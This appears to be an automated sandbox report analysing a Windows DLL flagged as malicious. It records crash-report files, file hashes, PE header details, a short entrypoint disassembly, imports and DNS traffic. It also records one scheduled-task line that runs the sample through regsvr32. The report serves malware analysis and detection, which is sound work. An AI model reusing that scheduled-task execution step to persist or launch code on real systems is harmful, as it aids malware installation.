Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.211.6.115, 20.82.210.154, 20.54.110.249, 40.112.88.60, 80.67.82.211, 80.67.82.235, 20.50.102.62 Excluded domains from analysis (whitelisted): displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information.

Simulations

Behavior and APIs

Time	Type	Description
10:23:21	Task Scheduler	Run new task: payuhfp path: regsvr32.exe s>-s "C:\Users\user\Desktop\ZBvNS77A7a.dll"

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_regsvr32.exe_e9a58211ba4d9ba1b3cadfec684f66ac60801b0_7a325c51_04ce1181\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	11500
Entropy (8bit):	3.7763436141995625
Encrypted:	false
SSDEEP:	192:Wzcub6VYkH/RS5uGXx3RjetM/u7sJS274ItUW:Qcw6Vb/RS5n3jee/u7sJX4ItUW
MD5:	463A67AC9E7EC8B0B962C5386749B5EB
SHA1:	9932B716AE52E8D904602F53D26727C9DA8F8CB2
SHA-256:	50C6047B7D3199121C82DF91533E16362CE4E85BBE34308E8F3A91643E419B65
SHA-512:	06825E10486556D11CFC1CB5AD0ED36E63A27ADF107DE3C4AF6687486E299A819094E4D919030B3A2ECA17BE1AEF51DB36743C6F90712FE2951BCDAE89E59A39
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.7.0.3.1.8.1.2.1.5.9.7.0.8.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.e.e.1.1.c.7.2.-.4.2.d.e.-.4.4.1.e.-.8.c.1.1.-.6.e.4.8.9.a.8.f.d.e.2.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.9.0.8.b.4.3.a.-.f.a.2.e.-.4.6.4.2.-.a.b.9.2.-.7.a.c.3.5.3.0.f.2.e.0.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.e.g.s.v.r.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.E.G.S.V.R.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.3.8.-.0.0.0.0.-.0.0.1.b.-.2.c.4.4.-.b.f.9.a.e.6.b.1.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.8.6.3.0.f.6.0.e.7.3.4.5.4.6.7.0.a.7.d.9.b.6.4.c.9.8.b.4.7.9.8.d.1.d.e.8.8.7.2.!.r.e.g.s.v.r.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.7.1././.0.4././.0.9.:.1.7.:.2.8.:.2.3.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_regsvr32.exe_e9a58211ba4d9ba1b3cadfec684f66ac60801b0_7a325c51_1b176866\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	11496
Entropy (8bit):	3.7784669961245267
Encrypted:	false
SSDEEP:	192:Kdzcdb6VVkH/RS5uGXx3RjetM/u7suS274ItUO:KBcJ6Vu/RS5n3jee/u7suX4ItUO
MD5:	5A8B6D5D1EA2CD3F25FCB3E2EAC13AA0
SHA1:	238C25DC1680448F8C61684641FDBDB6B330C23A
SHA-256:	90162554559683001CCA548AF5C6D07754B326EED7F428389958A764AB53DEC1
SHA-512:	ED4678FE08C2861F42957B4057FC25CF22D441BDCEEAB005F094885621B8046F7CD2EC5C2F7E586CD56E56A3A9971726BE31186BADEB7992A8F9496D20A65E9C
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.7.0.3.1.9.0.4.8.4.2.5.8.7.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.8.1.3.b.e.4.d.-.9.a.2.c.-.4.3.b.f.-.a.6.5.d.-.7.7.7.0.7.6.9.c.e.a.5.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.9.0.a.d.8.5.0.-.4.f.b.4.-.4.1.2.9.-.b.f.f.2.-.9.f.f.9.c.8.9.e.5.a.6.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.e.g.s.v.r.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.E.G.S.V.R.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.c.8.-.0.0.0.0.-.0.0.1.b.-.b.8.7.9.-.f.f.d.4.e.6.b.1.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.8.6.3.0.f.6.0.e.7.3.4.5.4.6.7.0.a.7.d.9.b.6.4.c.9.8.b.4.7.9.8.d.1.d.e.8.8.7.2.!.r.e.g.s.v.r.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.7.1././.0.4././.0.9.:.1.7.:.2.8.:.2.3.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5C6F.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Sat Sep 25 08:25:06 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	35026
Entropy (8bit):	2.6261355120448786
Encrypted:	false
SSDEEP:	192:OCLJ0+qAUUFDMiwFHYYEcTAsOW+N8dLOglhcTgpmax9ZnANM:XLOWLF1wFHhPTvoGHhckpjxPSM
MD5:	5D31475311D93231DDBCD9BA6BD5BA55
SHA1:	7BDFAB76DF8E9B510E25F314B3609C9590004992
SHA-256:	B64A5890E8F04D4A6BA99601781CC64D9C6B1536A0781143CBD3DD9F052A3346
SHA-512:	C3247C860C7F77EF643B28453AAA64215A86D24484CC882661056C8404CD493AEC831CD2E15A0DA3FD1EBAC84819D0EA9952C7AED7F4BB01F146230D80015621
Malicious:	false
Preview:	MDMP....... .........Na...................U...........B..............GenuineIntelW...........T.............Na.............................@..1...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER62E9.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8278
Entropy (8bit):	3.6950810684096487
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNimw6Dqxve6YwDSU+gmfJjSx+pBB89bcbsfi0m:RrlsNih6Z6Y8SU+gmfJjSpcgfg
MD5:	F94634BA3AA7A1D7A0BC36B4676D37F4
SHA1:	57D96DFC0FB1DF4004A3984443F4D3A1BEB37A00
SHA-256:	99BCE543BB148DE22D98A4DA12C00494DE1851984C579314CF178C85E3DB0B39
SHA-512:	F8616AE3E68C03B59F132A18F8313369E53407D5C37385C0633098FD077E3BDA69F87E739152BE69C1942337B06345877D6E24C49B041C482A79B0E63C62C10E
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.5.7.6.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER653B.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4630
Entropy (8bit):	4.465614395578264
Encrypted:	false
SSDEEP:	48:cvIwSD8zsbJgtWI9jbWSC8BL8fm8M4JkxWFfT+q8zduKJYegd:uITf1AqSNqJnT9qYegd
MD5:	A22317ACAD0A7881DEEFD578FD331502
SHA1:	8D81BFD8496A4591D9E65D9E59A7D1099C9D94AC
SHA-256:	7B5623B3AC94AFF4431845877E8372C08FEEF5FAC00C5577C2BFE54E42711D2A
SHA-512:	0CBCB0AB7B9C8102442B7685907DE4D9357F522EFAC9347FF0950879BE1E625267E931C297DDADB09A2B78BDB0699E5ABB466557C23F6537DA1243FF1C9406F9
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1181855" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WER955.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4630
Entropy (8bit):	4.462098660842768
Encrypted:	false
SSDEEP:	48:cvIwSD8zs0JgtWI9jbWSC8BT8fm8M4JkxWFAgP+q8zd9KJYyRgd:uITfyAqSN2J9POqYyRgd
MD5:	C3F41612D9BFFE36894E5765A49D50E3
SHA1:	0B38B318423E6242D3F1F55779B7B2089B88F192
SHA-256:	073E01EF57E9934CE18E57CBD7B3404B4C8F347D29703EBD80C87B9DBC74CDD1
SHA-512:	F34619CF44959E7BFFE6A63D975EAB84BA2A61663508A88AEE3B2DF222A328F3FC43F6CA7553D37447A045AEFBC152B8A45FE212FF00B08D9EB848A5BE6540CA
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1181854" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF241.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Sat Sep 25 08:23:34 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	35382
Entropy (8bit):	2.6628405818008596
Encrypted:	false
SSDEEP:	384:z6pIXEp7k/8JpD1iDWmUrgnGwhctnFl9h:zUg/srrM9ctndh
MD5:	91DF5FF5B9BC1DA3D1644ECA8FBB2F8E
SHA1:	E49D85C5C4A9D110B3DE839FE920C877893BB7F2
SHA-256:	5430CB813F7DB685ECEB2F6FD30264D0A7396769BB6A96CD302773ABC871D819
SHA-512:	BF86BDCDBE3B3B9BBF3338758B8835A2AA8211D0FD1D8A64D5A361832D77C037606B747909082756BA6A650D48DC2525D48EB20A7F02B956398F23C7A7EA147C
Malicious:	false
Preview:	MDMP....... .........Na...................U...........B..............GenuineIntelW...........T.......8...z.Na.............................@..1...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFFEE.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8282
Entropy (8bit):	3.695195907500495
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNipFd676YB+MSUBgmfJjSx+pBB89bpisfLajm:RrlsNipv676YBlSUBgmfJjSpphfT
MD5:	7E717EA850E4710974F964DA9347D310
SHA1:	80858E5218A190A1BD271098947A15BF1422A4FA
SHA-256:	2843D9EBCCD91B310DE9C2661F45278B4EED0DC5A83A18B5FCC791577EBE84F0
SHA-512:	752BC595A439DB591B5E7AF93408FAE2793BAD55F3501D139DD01B9CFBFC57F33D38BD05C39B2B09819B83C594C26152E40E75F7C28937FB90BE5BDAFFBC073B
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.9.4.4.<./.P.i.d.>.......

C:\Users\user\Desktop\ZBvNS77A7a.dll Download File
Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	330189
Entropy (8bit):	2.2090413355109213
Encrypted:	false
SSDEEP:	1536:/IUtVWns2GwmzYSbbz1j+xEXnQud+3VLuoXBYjPYH+ryO3O:/ZVWsP/sSb1ax0A3tDXBYjPYH+ryyO
MD5:	9147A4BB8EFF884F129AAD7E0C68D1C5
SHA1:	BA7E1C01F60E38FA8E0C420332BEAA82B647400D
SHA-256:	31682BA44B1B11AC8C4F9FDE98E63AFCF32D7AD143587FA631496E83464FF7C3
SHA-512:	46810C2FEE829EDF0FA52FD75DD25DAF32F2064629EF778BF94A73A54CBCE07770303F52B16808DFC97C3ED3C81188BFE4AF1491F6B98FD5DC8A679F8F24FDDE
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;a...........!......................... ..............................................................................lZ..x....@...b...........................................................................Z..l............................text...t........................... ..`.data........ ......................@....data...d....0...0..................@....rsrc....b...@...d...F..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.5705642690440875
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.40% Win16/32 Executable Delphi generic (2074/23) 0.21% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	ZBvNS77A7a.dll
File size:	330189
MD5:	6484d8ffd4a6de7947534571e9907b4e
SHA1:	41e1cbd037698c3329db4edfe4e6b28b0654e94c
SHA256:	64a6039b2b3a347312f56170b5eb7deebe6d37ef6fb414fb929e84be4799dfa5
SHA512:	5545f50a5c5d2367c03a199832ff78d00fa7f172017007ba0e45c75190640cd79540d351db14279d3a505014ff380a12e00f796ec08038634f4d3641a61b7da0
SSDEEP:	6144:9/st+16ZWiobj+n5QZRO0Xj/Ee+aRLvccAOPyI:A+QoOaEFA7RD
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;a...........!......................... .............................................................................

File Icon


Icon Hash:	aca9a8acaca6a888

Static PE Info

General
Entrypoint:	0x100019a1
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:
Time Stamp:	0x613B8C85 [Fri Sep 10 16:49:09 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	6527345f9aee9363b094aad01304de88

Entrypoint Preview

Instruction
push 00000000h
push ebp
mov ebp, esp
add esp, FFFFFFF4h
call 00007FA5388AF212h
cmp ebx, eax
je 00007FA5388AC9B9h
pushad
add edi, ebx
inc ecx
add ecx, eax
push eax
push ecx
push 00000025h
cmp dword ptr [ebx+00433230h], 00000000h
jne 00007FA5388AC72Eh
push 00000000h
call dword ptr [ebx+00435A3Ch]
push ecx
and ecx, 00000000h
xor ecx, eax
and dword ptr [ebx+00433230h], 00000000h
or dword ptr [ebx+00433230h], ecx
pop ecx
cmp dword ptr [ebx+004333D8h], 00000000h
jne 00007FA5388AC7B2h
cmp dword ptr [ebx+0043384Ch], 00000000h
jne 00007FA5388AC730h
call dword ptr [ebx+00435A38h]
mov dword ptr [ebp-04h], ecx
xor ecx, dword ptr [ebp-04h]
xor ecx, eax
and dword ptr [ebx+0043384Ch], 00000000h
or dword ptr [ebx+0043384Ch], ecx
mov ecx, dword ptr [ebp-04h]
push dword ptr [ebx+00433490h]
cmp dword ptr [ebx+0043342Ch], 00000000h
jne 00007FA5388AC733h
lea eax, dword ptr [ebx+0043325Ch]
push eax
call dword ptr [ebx+00435A24h]
push edi
xor edi, dword ptr [esp]
xor edi, eax
and dword ptr [ebx+0043342Ch], 00000000h
xor dword ptr [ebx+0043342Ch], edi
pop edi
push FFFFFFDEh
cmp dword ptr [ebx+004332F8h], 00000000h
jne 00007FA5388AC72Ch
call dword ptr [ebx+00435A34h]
push edx
and edx, 00000000h
xor edx, eax
and dword ptr [ebx+004332F8h], 00000000h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x35a6c	0x78	.data
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4034000	0x162e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x35a00	0x6c	.data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x30974	0x30a00	False	0.564327602828	data	6.10041951577	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x32000	0x1000	0x800	False	0.01123046875	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.data	0x33000	0x4000c64	0x3000	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x4034000	0x162e0	0x16400	False	0.151454968399	data	4.89622756249	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x40343d0	0x10828	dBase III DBT, version number 0, next free block index 40	English	United States
RT_ICON	0x4044bf8	0x25a8	dBase III DBT, version number 0, next free block index 40	English	United States
RT_ICON	0x40471a0	0x10a8	data	English	United States
RT_ICON	0x4048248	0x988	data	English	United States
RT_MENU	0x4048bd0	0x2d4	data	English	United States
RT_MENU	0x4048ea4	0x196	data	English	United States
RT_MENU	0x404903c	0x1a6	data	English	United States
RT_MENU	0x40491e4	0xb8	data	English	United States
RT_STRING	0x404929c	0x934	data	English	United States
RT_STRING	0x4049bd0	0x4a8	data	English	United States
RT_RCDATA	0x404a078	0x23	data	English	United States
RT_RCDATA	0x404a09c	0xc	data	English	United States
RT_RCDATA	0x404a0a8	0xf	data	English	United States
RT_RCDATA	0x404a0b8	0x24	data	English	United States
RT_RCDATA	0x404a0dc	0x2d	data	English	United States
RT_GROUP_ICON	0x404a10c	0x46	data	English	United States
RT_MANIFEST	0x404a154	0x18a	XML 1.0 document, ASCII text	English	United States

Imports

DLL	Import
kernel32.dll	GetProcAddress, LoadLibraryA, VirtualAlloc, VirtualProtect, GetCurrentThread
user32.dll	CheckDlgButton, GetCursorInfo, CheckMenuRadioItem, GetCaretBlinkTime, CheckRadioButton, GetCapture, CheckMenuItem
ole32.dll	CoCreateGuid, CoGetCurrentLogicalThreadId, CoFileTimeNow, OleUninitialize, CoGetContextToken, CoFreeUnusedLibraries, CoGetCurrentProcess, OleInitialize
advapi32.dll	LsaOpenTrustedDomain

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 25, 2021 10:22:56.624871016 CEST	59123	53	192.168.2.4	8.8.8.8
Sep 25, 2021 10:22:56.648972034 CEST	53	59123	8.8.8.8	192.168.2.4
Sep 25, 2021 10:23:29.761882067 CEST	54531	53	192.168.2.4	8.8.8.8
Sep 25, 2021 10:23:29.790786028 CEST	53	54531	8.8.8.8	192.168.2.4
Sep 25, 2021 10:23:56.157160997 CEST	49714	53	192.168.2.4	8.8.8.8
Sep 25, 2021 10:23:56.209856033 CEST	53	49714	8.8.8.8	192.168.2.4
Sep 25, 2021 10:23:56.811824083 CEST	58028	53	192.168.2.4	8.8.8.8
Sep 25, 2021 10:23:56.893886089 CEST	53	58028	8.8.8.8	192.168.2.4
Sep 25, 2021 10:23:57.427287102 CEST	53097	53	192.168.2.4	8.8.8.8
Sep 25, 2021 10:23:57.446943998 CEST	53	53097	8.8.8.8	192.168.2.4
Sep 25, 2021 10:23:57.723603964 CEST	49257	53	192.168.2.4	8.8.8.8
Sep 25, 2021 10:23:57.753066063 CEST	53	49257	8.8.8.8	192.168.2.4
Sep 25, 2021 10:23:57.809922934 CEST	62389	53	192.168.2.4	8.8.8.8
Sep 25, 2021 10:23:57.855709076 CEST	53	62389	8.8.8.8	192.168.2.4
Sep 25, 2021 10:23:58.297625065 CEST	49910	53	192.168.2.4	8.8.8.8
Sep 25, 2021 10:23:58.317385912 CEST	53	49910	8.8.8.8	192.168.2.4
Sep 25, 2021 10:23:58.721641064 CEST	55854	53	192.168.2.4	8.8.8.8
Sep 25, 2021 10:23:58.741311073 CEST	53	55854	8.8.8.8	192.168.2.4
Sep 25, 2021 10:23:59.169665098 CEST	64549	53	192.168.2.4	8.8.8.8
Sep 25, 2021 10:23:59.232000113 CEST	53	64549	8.8.8.8	192.168.2.4
Sep 25, 2021 10:23:59.971780062 CEST	63153	53	192.168.2.4	8.8.8.8
Sep 25, 2021 10:23:59.991473913 CEST	53	63153	8.8.8.8	192.168.2.4
Sep 25, 2021 10:24:00.670408964 CEST	52991	53	192.168.2.4	8.8.8.8
Sep 25, 2021 10:24:00.695043087 CEST	53	52991	8.8.8.8	192.168.2.4
Sep 25, 2021 10:24:01.096482038 CEST	53700	53	192.168.2.4	8.8.8.8
Sep 25, 2021 10:24:01.116421938 CEST	53	53700	8.8.8.8	192.168.2.4
Sep 25, 2021 10:24:11.056459904 CEST	51726	53	192.168.2.4	8.8.8.8
Sep 25, 2021 10:24:11.078437090 CEST	53	51726	8.8.8.8	192.168.2.4
